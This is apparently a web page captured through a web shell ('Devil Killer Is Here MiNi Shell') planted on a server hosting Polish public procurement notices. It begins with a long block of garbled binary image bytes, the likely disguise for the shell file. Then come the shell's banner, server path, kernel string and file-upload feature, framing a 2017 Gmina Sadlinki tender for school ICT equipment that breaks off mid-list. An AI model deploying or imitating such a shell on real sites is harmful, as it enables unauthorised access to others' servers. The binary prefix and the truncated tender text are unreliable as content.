JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170224/31958-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 31958 - 2017
              z dnia 2017-02-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Sadlinki: Zakup i dostawa  sprzętu TIK<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />LABORATORIUM KOMPETENCJI - Podniesienie jakości edukacji ogólnej wiejskiej Gminy Sadlinki poprzez wsparcie uczniów oraz nauczycieli w rozwijaniu kompetencji kluczowych wymaganych na rynku pracy współfinansowany z Regionalnego Programu Operacyjnego Województwa Pomorskiego 2014-2020, Oś 3, Działanie 3.1 Edukacja ogólna, Poddziałanie 3.2.1 Jakość edukacji ogólnej </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Sadlinki, krajowy numer identyfikacyjny
              17074804000000, ul.
              ul. Kwidzyńska 
              12,
              82522  
              Sadlinki, woj.
              pomorskie, państwo
              Polska, tel.
              552 757 510, e-mail
              zamowienia@sadlinki.pl, faks
              552 757 580.
              <br />
              Adres strony internetowej (URL): www.bip.sadlinki.pl<br />
                Adres profilu nabywcy:

                www.bip.sadlinki.pl<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej , za pośrednictwem np. poczty, kuriera lub osobiście <br />
                Adres:
                <br />Urząd Gminy , ul. Kwidzyńska 12 82-522 Sadlinki</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup i dostawa  sprzętu TIK<br /><b>Numer referencyjny: </b>ZP.271.4.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zakup i dostawa sprzętu TIK 

Zadanie 1: Kształtowanie i rozwijanie u uczniów kompetencji kluczowych w zakresie ICT niezbędnych na rynku pracy ZS Sadlinki i ZS Nebrowo

Dostawa do Zespołu Szkół Sadlinki, ul. Grudziądzka 14a, 82-522 Sadlinki

1)	Serwer z oprogramowaniem  sztuk 1
LP 	PARAMETR 	WYMAGANIA 
1 	Typ urządzenia 	Serwer z zainstalowanym i aktywowanym systemem operacyjnym
2	Procesor	Min. czterordzeniowy, czterowątkowy o częstotliwości min. 3,1 GHz oraz pamięci cache min. 8 MB, Procesor musi uzyskiwać wynik co najmniej 6000 punktów w teście Passmark-CPU Mark według wyników procesorów publikowanych na stronie http://www.cpubenchmark.net/cpu_list.php

Do oferty należy załączyć wydruk ze strony potwierdzający ww. wynik.
3 	Pamięć RAM	2x4 GB ub ECC
4 	Napęd	DVD-RW
5	Kontroler RAID	RAID 0,1
6	Dysk twardy	2x1TB SATA
7 	Peryferia	Klawiatura, mysz
8	Gwarancja	24 miesiące

2)	Drukarka kolorowa (urządzenie wielofunkcyjne)  sztuk 1
LP 	PARAMETR 	WYMAGANIA 
1 	Typ urządzenia 	Kolorowa urządzenie wielofunkcyjne formatu A3 z automatycznym drukiem dwustronnym, z opcją skanowania i kopiowania
2	Technologia wydruku 	atramentowa 
3 	Rozdzielczość drukowania 	2400x1200 dpi lub wyższa 
4 	Obciążenie miesięczne 	Co najmniej 25000 str. 
5	Podajniki papieru 	wymagany jest tylny podajnik na niestandardowe formaty 
6	Obsługiwane formaty papieru 	A3, A4, A5, A6, B5, C4 (koperta), C6 (koperta), Nr 10 (koperta), Letter, 10 x 15 cm, 13 x 18 cm, 20 x 25 cm, Legal 
7 	Duplex 	automatyczny 
8 	ADF 	Co najmniej 35 str., wymagany jest duplex 
9 	Rozdzielczość skanowania 	1200x2400dpi 
10 	Gwarancja	24 miesiące

3)	Komputer przenośny z systemem operacyjnym
LP 	PARAMETR 	WYMAGANIA 
1 	Typ urządzenia 	Komputer przenośny
2	Matryca	15,6,
3 	Procesor	Min. Dwurdzeniowy, czterowątkowy o częstotliwości min. 2,6 GHz oraz pamięci cache min. 3 MB, Procesor musi uzyskiwać wynik co najmniej 4400 punktów w teście Passmark-CPU Mark według wyników procesorów publikowanych na stronie http://www.cpubenchmark.net/cpu_list.php

Do oferty należy załączyć wydruk ze strony potwierdzający ww. wynik.
4 	Karta graficzna	Zintegrowana z procesorem, Intel HD Graphics 5500 lub równoważna
5	Karta sieciowa	zintegrowana z płytą główną
6	Karta dźwiękowa	Karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition
7 	Pamięć RAM	Min. 4 GB DDR3
8 	Dysk twardy	SSD min 120 GB
9	Napęd	Nagrywarka DVD+/-RW
10	System operacyjny	Zainstalowany i aktywowany system operacyjny Windows 10 Pro, 64 bit
11	Bateria	Min. 4 komorowa
12	Mysz optyczna USB	Mysz optyczna USB z rolką (scroll).
13	Gwarancja	24 miesiące
	
4)	Tablica interaktywna  sztuk 1 

LP 	PARAMETR 	WYMAGANIA 
1 	Obszar aktywny = wyświetlany tablicy 	1670 mm×1200 mm  (82) 
2	Obszar roboczy 	przekątna 201,50cm (79,3")
3 	Proporcje obrazu 	4:3 
4 	Technologia 	IR 10 ( minimum 10 dotyków) 
5	Podłączenie do komputera / zasilanie 	port USB (nie dopuszcza się zasilania dodatkowego typu 230V) 
6	Rozdzielczość 	32767x32767 
7 	Prędkość odczytu współrzędnych 	&gt;= 500 punktów na sekundę prędkość odczytu 
8 	Prędkość transmisji 	38400bps 
9 	Dokładność kalibracji 	0,01mm 
10 	Kalibracja 	4 i 16 punktowa 
11 	Powierzchnia tablicy 	Twarda matowa odporna na uszkodzenia 
Magnetyczna powierzchnia stalowa
12	Akcesoria 	2 pisaki bez elementów aktywnych dla tablicy dotykowej, kabel USB (5m), mocowanie do ściany  minimalnie 4 punktowe ( 2 od dołu i 2 od góry z blokadą) uniemożliwiające przypadkowe zdjęcie tablicy, Oprogramowanie w języku polskim 
13	Oprogramowanie 	Technologia pozycjonowania w podczerwieni (dotykowa)

1. Pełna paleta narzędzi do tworzenia elektronicznych adnotacji, takich jak: - różnokolorowe pisaki 
- Zakreślacze 
- pisaki wielokolorowe 
- pisaki tekstury 
- pióro stalówka 
- pióro pędzel 
- predefiniowane kształty (linie, strzałki, figury geometryczne) 
- laserowe piórko (migający zakreślacz, znikający po kolejnym zaznaczeniu) 
2. Definiowanie łączy do dowolnych obiektów 
3. Rozpoznawanie i konwersja rysowanych odręcznie podstawowych figur geometrycznych 
4. Narzędzia do geometrii: skalowana linijka (stała podziałka możliwość skracania i wydłużania linijki jak taśmy mierzącej, skalowalna identycznie jak linijka ekierka, dodatkowo kątomierz i cyrkiel) 
5. Zmiana grubości i koloru dowolnego narysowanego obiektu, czy linii 
6. Wypełnienie dowolnym kolorem zamkniętych obszarów narysowanych obiektów i kształtów 
7. Pełna edycja obiektów: obrót, przesuwanie, zmiana rozmiarów, ustawianie kolejności czy grupowanie i rozgrupowanie obiektów 
8. W pełni edytowalna, wbudowana Galeria, zawierająca tysiące obrazków, gotowych szablonów. 
9. W pełni edytowalna, wbudowana Galeria grup grafik, zdjęć tematycznych oraz teł ( jeden plik to dowolna liczba zdjęć czy grafik ) 
10. Tworzenie własnych grup graficznych z dowolnych obrazów, tak aby nauczyciel był w stanie przygotować zestaw potrzebnych grafik lub obrazów zamkniętych w jednym pliku w celu łatwego użycia podczas lekcji. 
11. Eksport do formatów wykorzystywanych przez zamawiającego: 
- plików Microsoft PowerPoint 97-2003 (PPT) 
- plików Microsoft Word 97-2003 (DOC) 
- plików Microsoft Excel 97-2003 (XSL) 
- plików Adobe Portable Document (PDF) 
- plików stron internetowych (HTML) 
- plików CorelDraw (CDR 
- plików graficznych (BMP, JPG, PNG, GIF, TIF) 
- plików grup graficznych  tworzonych przez użytkownika 
- plików grup teł  tworzonych przez użytkownika 
12. Wstawianie plików wideo, audio 
13. Wstawianie tekstu za pomocą klawiatury ekranowej 
14. Rozpoznawanie i konwersja pisma odręcznego 
15. Inteligentne zrzuty ekranu umieszczane w środowisku pracy (zaznaczenie, cały ekran, dostępne okna aplikacji lub dowolny kształt) 
16. Zakrywanie treści przy zastosowaniu kurtyny ekranowej i elektronicznego reflektora 
17. Narzędzie pozwalające przesunąć całą zawartość grafik i tekstu 
14	Gwarancja	36 miesięcy

5)	Projektor multimedialny  sztuk  1
LP 	PARAMETR 	WYMAGANIA 
1 	Technologia projekcji 	1-chip DLP Technology 
2	Rozdzielczość 	Rozdzielczość dopasowana do wymogów tablicy 
3 	Proporcje obrazu 	4:3 
4 	Kontrast 	10000:1 
5	Jasność 	3000 ANSI Lumenów 
6	Moc lampy 	195 W AC (160 W AC Tryb Eco ) 
7 	Żywotność lampy [godz] 	4500 (6000 Tryb Eco) 
8 	Obiektyw 	F= 2,412,55, f= 21,824 mm 
9 	Korekcja zniekształceń trapezowych 	ręcznie w pionie = 40° 
10 	Współczynnik projekcji 	1.95  2.15 : 1 
11 	Odległość projekcji [m] 	1.19  13.1 
12	Wielkość (przekątna) ekranu [cale] 	Maksymalnie: 300; Minimalnie: 30 
13	Zoom 	Ręczny lub automatyczny 
14	Regulacja ogniskowej 	Ręczna lub automatyczna 
15	Obsługiwane rozdzielczości 	1920 x 1080 (HDTV 1,080i/60, HDTV 1,080i/50); 1400 x 1050 (SXGA); 1280 x 1024 (SXGA); 1280 x 720 (HDTV 720p); 1152 x 870 (MAC 21); 1024 x 768 (XGA); 832 x 624 (MAC 16); 800 x 600 (SVGA); 720 x; 720 x 480 SDTV 480p; 720 x 480 640 x 480 (VGA) 
16	Wejścia: 
Komputer (analogowe) 	Wejście: 1 x Mini D-sub 15-pin, kompatybilne z  eb servi (YpbPr) 
17	Cyfrowe 	Wejście: 1 x HDMI 
18	Sygnał video 	Wejście: 1 x RCA 
19	Audio 	Wejście: 1 x 3.5 mm Stereo Mini Jack 
20	Control 	Wejście: 1 x D-Sub 9 pin (RS-232) (męskie) 
21	USB 	1 szt. 
22	Video 	NTSC; NTSC 4.43; PAL; PAL-M; PAL-N; PAL60; SECAM 
23	Głośniki [W] 	1 x 2 (mono) 
24	Typ 	DLP 
25	Jasność [ANSI Lumen] 	3000 
26	Kontrast 	10000:1 
27	Proporcje wyświetlania 	4:3 
28	Żywotność lampy [godz] 	6000 
29	Waga [kg] 	2.6 
30	Moc lampy 	195 W AC (160 W AC Tryb Eco ) 
31	Gwarancja 	36 miesięcy na projektor i lampę 

6)	Oprogramowanie do obróbki grafiki wektorowej  Wieczysta licencja na 16 stanowisk
LP 	NAZWA	WYMAGANIA 
1 	Corel DRAW Graphics Suite X7  lub wyższy bądź program równoważny	Corel DRAW Graphics Suite X7  lub wyższy bądź program równoważny na 16 stanowisk,  umożliwiający co najmniej: 
1. Tworzenie grafiki wektorowej i układu stron 
2. Edycję zdjęć 
3. Zarządzanie czcionkami TrueType i OpenType 
4. Przekształcanie map bitowych na postać wektorową 
5. Wyszukiwanie zasobów 
6. Przechwytywanie zawartości ekranu 
7. Projektowanie witryn internetowych 
2	Licencja	Wieczysta licencja na 16 stanowisk
3	Wersja językowa	polska

7)	Program biurowy  Licencja na 10 stanowisk (wersja edukacyjna)
LP 	NAZWA	WYMAGANIA 
1 	MS Office Standard 2013 Microsoft Edukacja lub równoważny	Wymagania odnośnie interfejsu użytkownika: 
a) Pełna polska wersja językowa interfejsu użytkownika; 
b) Prostota i intuicyjność obsługi, pozwalająca na prace osobom nieposiadającym umiejętności technicznych; 
c) Możliwość zintegrowania uwierzytelniania użytkowników z usługą 
- użytkownik raz zalogowany z poziomu systemu operacyjnego stacji roboczej musi być automatycznie rozpoznawany we wszystkich modułach oferowanego rozwiązania bez potrzeby oddzielnego monitowania go o ponowne uwierzytelnienie się; 

2. Oprogramowanie musi umożliwiać tworzenie i edycje dokumentów elektronicznych w formacie, który spełnia następujące warunki: 
a) posiada kompletny i publicznie dostępny opis formatu, 
b) ma zdefiniowany układ informacji w postaci XML zgodnie z Tabela B1 załącznika 2 Rozporządzenia w sprawie minimalnych wymagań dla systemów teleinformatycznych (Dz.U.05.212.1766)
c) umożliwia wykorzystanie schematów XML 
d) wspiera w swojej specyfikacji podpis elektroniczny zgodnie z Tabela A.1.1 załącznika 2 Rozporządzenia w sprawie minimalnych wymagań dla systemów teleinformatycznych (Dz.U.05.212.1766) 

3. Oprogramowanie musi umożliwiać dostosowanie dokumentów i szablonów do potrzeb użytkownika oraz udostępniać narzędzia umożliwiające dystrybucję odpowiednich szablonów do właściwych odbiorców; 

4. W skład oprogramowania musza wchodzić narzędzia umożliwiające automatyzację pracy i wymianę danych pomiędzy dokumentami i aplikacjami; 

5. Do aplikacji musi być dostępna pełna dokumentacja w języku polskim;

6. Pakiet zintegrowanych aplikacji biurowych musi zawierać: 
a) Edytor tekstów 
b) Arkusz kalkulacyjny 
c) Narzędzie do przygotowywania i prowadzenia prezentacji 

7. Edytor tekstów musi umożliwiać: 
a) Edycję i formatowanie tekstu w języku polskim wraz z obsługa języka polskiego w zakresie sprawdzania pisowni i poprawności gramatycznej oraz funkcjonalnością słownika wyrazów bliskoznacznych i autokorekty 
b) Wstawianie oraz formatowanie tabel 
c) Wstawianie oraz formatowanie obiektów graficznych 
d) Wstawianie wykresów i tabel z arkusza kalkulacyjnego (wliczając tabele przestawne) 
e) Automatyczne numerowanie rozdziałów, punktów, akapitów, tabel i rysunków 
f) Automatyczne tworzenie spisów treści 
g) Formatowanie nagłówków i stopek stron 
h) Sprawdzanie pisowni w języku polskim 
i) Śledzenie zmian wprowadzonych przez użytkowników 
j) Nagrywanie, tworzenie i edycje makr automatyzujących wykonywanie czynności 
k) Określenie układu strony (pionowa/pozioma) 
l) Wydruk dokumentów 
m) Wykonywanie korespondencji seryjnej bazując na danych adresowych pochodzących z arkusza kalkulacyjnego i z narzędzia do zarzadzania informacją prywatną 
n) Prace na posiadanych przez zamawiającego dokumentach utworzonych przy pomocy Microsoft Word 2003 lub Microsoft Word 2007 i 2010 z zapewnieniem bezproblemowej konwersji wszystkich elementów i atrybutów dokumentu 
o) Zabezpieczenie dokumentów hasłem przed odczytem oraz przed wprowadzaniem modyfikacji 
p) Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających wykorzystanie go, jako środowiska udostępniającego formularze bazujące na schematach XML z Centralnego Repozytorium Wzorów Dokumentów Elektronicznych, które po wypełnieniu umożliwiają zapisanie pliku XML w zgodzie z obowiązującym prawem. 
q) Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających podpisanie podpisem elektronicznym pliku z zapisanym dokumentem przy pomocy certyfikatu kwalifikowanego zgodnie z wymaganiami obowiązującego w Polsce prawa. 
r) Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających wykorzystanie go, jako środowiska udostępniającego formularze i pozwalające zapisać plik wynikowy w zgodzie z Rozporządzeniem o Aktach Normatywnych i Prawnych. 

8. Arkusz kalkulacyjny musi umożliwiać: 
a) Tworzenie raportów tabelarycznych 
b) Tworzenie wykresów liniowych (wraz linia trendu), słupkowych, kołowych 
c) Tworzenie arkuszy kalkulacyjnych zawierających teksty, dane liczbowe oraz formuły przeprowadzające operacje matematyczne, logiczne, tekstowe, statystyczne oraz operacje na danych finansowych i na miarach czasu. 
d) Tworzenie raportów z zewnętrznych źródeł danych (inne arkusze kalkulacyjne, bazy danych zgodne z ODBC, pliki tekstowe, pliki XML,  eb service) 
e) wspomagające analizę statystyczną i finansową, analizę wariantową i rozwiązywanie problemów optymalizacyjnych 
f) Tworzenie raportów tabeli przestawnych umożliwiających dynamiczna zmianę wymiarów oraz wykresów bazujących na danych z tabeli przestawnych 
g) Wyszukiwanie i zamianę danych 
h) Wykonywanie analiz danych przy użyciu formatowania warunkowego 
i) Nazywanie komórek arkusza i odwoływanie się w formułach po takiej nazwie 
j) Nagrywanie, tworzenie i edycje makr automatyzujących wykonywanie czynności 
k) Formatowanie czasu, daty i wartości finansowych z polskim formatem 
l) Zapis wielu arkuszy kalkulacyjnych w jednym pliku. 
m) Zachowanie pełnej zgodności z formatami posiadanych przez zamawiającego plików utworzonych za pomocą oprogramowania Microsoft Excel 2003 oraz Microsoft Excel 2007 i 2010, z uwzględnieniem poprawnej realizacji użytych w nich funkcji specjalnych i makropoleceń.. 
n) Zabezpieczenie dokumentów hasłem przed odczytem oraz przed wprowadzaniem modyfikacji 

9. Narzędzie do przygotowywania i prowadzenia prezentacji musi umożliwiać przygotowywanie prezentacji multimedialnych oraz: 
a) Prezentowanie przy użyciu projektora multimedialnego 
b) Drukowanie w formacie umożliwiającym robienie notatek 
c) Zapisanie w postaci tylko do odczytu. 
d) Nagrywanie narracji dołączanej do prezentacji 
e) Opatrywanie slajdów notatkami dla prezentera 
f) Umieszczanie i formatowanie tekstów, obiektów graficznych, tabel, nagrań dźwiękowych i wideo 
g) Umieszczanie tabel i wykresów pochodzących z arkusza kalkulacyjnego 
h) Odświeżenie wykresu znajdującego się w prezentacji po zmianie danych w źródłowym arkuszu kalkulacyjnym 
i) Tworzenie animacji obiektów i całych slajdów 
j) Prowadzenie prezentacji w trybie prezentera, gdzie slajdy są widoczne na jednym monitorze lub projektorze, a na drugim widoczne są slajdy i notatki prezentera 
k) Pełna zgodność z formatami plików posiadanych przez zamawiającego, utworzonych za pomocą oprogramowania MS PowerPoint 2003, MS PowerPoint 2007 i 2010. 

2	Licencja	Licencja na 10 stanowisk na oprogramowanie biurowe (licencja dla oświaty)
3	Wersja językowa	polska


8)	Oprogramowanie do obróbki grafiki rastrowej ADOBE Photoshop Elements 14 + Premiere Elements 14 PL lub równoważny  Wieczysta licencja na 10 stanowisk wygenerowana dla odbiorcy
LP 	NAZWA	WYMAGANIA 
1 	ADOBE Photoshop Elements 14 + Premiere Elements 14 PL lub równoważny	Program do obróbki rastrowej ADOBE Photoshop Elements 14 + Premiere Elements 14 PL lub równoważny,  umożliwiający co najmniej: 

1. Edycję grafiki rastrowej, z obsługą kształtów wektorowych 
2. Edycję i obróbkę cyfrową zdjęć oraz filmów video
3. Zarządzanie czcionkami TrueType i OpenType 
4. Przekształcanie map bitowych na postać wektorową 
5. Przechwytywanie zawartości ekranu oraz poligrafii
6. Projektowanie witryn internetowych 

2	Licencja	Wieczysta licencja na 10 stanowisk  wygenerowana dla odbiorcy
3	Wersja językowa	polska

Dostawa do ZS w Nebrowie Wielkim, ul. Szkolna 6, 82-522 Sadlinki

1)	Serwer z oprogramowaniem  sztuk 1
Specyfikacja jak w przypadku dostawy do ZS Sadlinki.

2)	Drukarka kolorowa (urządzenie wielofunkcyjne)  sztuk 1
Specyfikacja jak w przypadku dostawy do ZS Sadlinki.

3)	Komputer przenośny z systemem operacyjnym i torbą  sztuk 10
Specyfikacja jak w przypadku dostawy do ZS Sadlinki.

4)	Tablica interaktywna  sztuk 1
Specyfikacja jak w przypadku dostawy do ZS Sadlinki.

5)	Projektor multimedialny  sztuk  1
Specyfikacja jak w przypadku dostawy do ZS Sadlinki.

6)	Oprogramowanie do obróbki grafiki wektorowej  Wieczysta licencja na 16 stanowisk
